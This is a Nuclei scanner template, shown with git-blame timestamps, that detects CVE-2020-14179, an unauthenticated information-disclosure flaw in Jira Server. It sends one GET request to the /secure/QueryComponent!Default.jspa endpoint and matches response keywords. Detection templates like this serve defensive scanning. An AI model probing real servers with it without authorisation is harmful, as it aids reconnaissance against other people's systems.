nuclei-templates/cves/2020/CVE-2020-14179.yaml

33 lines
1020 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-14179
2020-09-22 15:44:12 +00:00
info:
name: Sensitive data exposure via insecure Jira endpoint
author: x1m_martijn
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the
/secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
reference:
- https://jira.atlassian.com/browse/JRASERVER-71536
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-14179
tags: cve,cve2020,atlassian,jira,exposure,disclosure
2020-09-22 15:44:12 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/secure/QueryComponent!Default.jspa"
2020-09-22 16:03:17 +00:00
matchers-condition: and
2020-09-22 15:44:12 +00:00
matchers:
- type: word
words:
- "searchers"
2020-09-22 16:03:17 +00:00
- "groups"
2020-09-24 18:02:55 +00:00
condition: and
2020-09-22 16:03:17 +00:00
2020-09-22 15:44:12 +00:00
- type: status
status:
- 200